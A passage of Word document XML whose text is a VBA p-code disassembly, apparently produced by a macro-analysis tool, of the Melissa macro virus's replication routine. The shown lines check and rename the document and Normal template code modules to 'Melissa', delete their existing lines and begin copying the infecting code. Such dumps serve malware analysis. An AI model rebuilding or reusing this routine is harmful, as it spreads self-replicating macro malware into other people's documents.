        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48077DC2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62706426" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CountOfLines </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBEFC7F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St ADCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E93CD3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #39:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCF3655" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B641FE3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B282C79" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #40:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3ECBBE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471AEAD3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF8055" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0007 "Melissa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDB3B5B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E810347" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76677FE0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #41:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1A058" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LineCont 0x0004 05 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0291466F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A47CA8C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F321582" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Gt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6FF2FE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C9E127" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoSImplicit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCF57B5" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7064799E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599A8B72" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E487BB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1237D951" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall DeleteLines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0398BDBD" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B3AFD0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #42:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C8239" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CC9F5F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0AD11C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set ToInfect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04F198" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #43:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B52690" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0007 "Melissa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D95540D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C66C95" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4085B1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #44:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6555B0EA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2370E424" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St DoAD </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CECF878" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #45:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A04E0B1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582CE2FB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #46:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0C9A9D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7794544B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072CA98" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0007 "Melissa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2DAC0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1EADB3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FA7D7A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #47:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC75CF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LineCont 0x0004 05 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14303A6D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193E323B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0219B19E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Gt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBFA602" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095069A2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoSImplicit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF11A3B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788833FA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3F096A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3958EA45" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23202CD7" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall DeleteLines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2464EA6E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E824BE3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #48:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A619B4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A351137" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E24A84" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set ToInfect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24517422" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #49:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E10F72" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0007 "Melissa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1A731D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBEEC30" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1077C050" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #50:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D196C7E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3363F6CA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St DoNT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF7522" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #51:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3D5359" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB34770" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>' Line #52:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC85FD0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DoNT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68109D61" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607284F4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24636201" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DoAD </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B38048" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684CFB4F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C51E588" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">And </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF7876" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441D09A1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoSImplicit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29073943" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">GoTo CYA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152C75AA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AAC8AE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #53:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E1B7D1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DoNT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6555A963" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22501A5A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760FAAEF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521D9486" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #54:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D7C2B4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17554E0F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA040AF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DE4BFF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1647FB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Lines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D459ED" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318AA8BF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F788473" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">DoWhile </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7DFA2E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
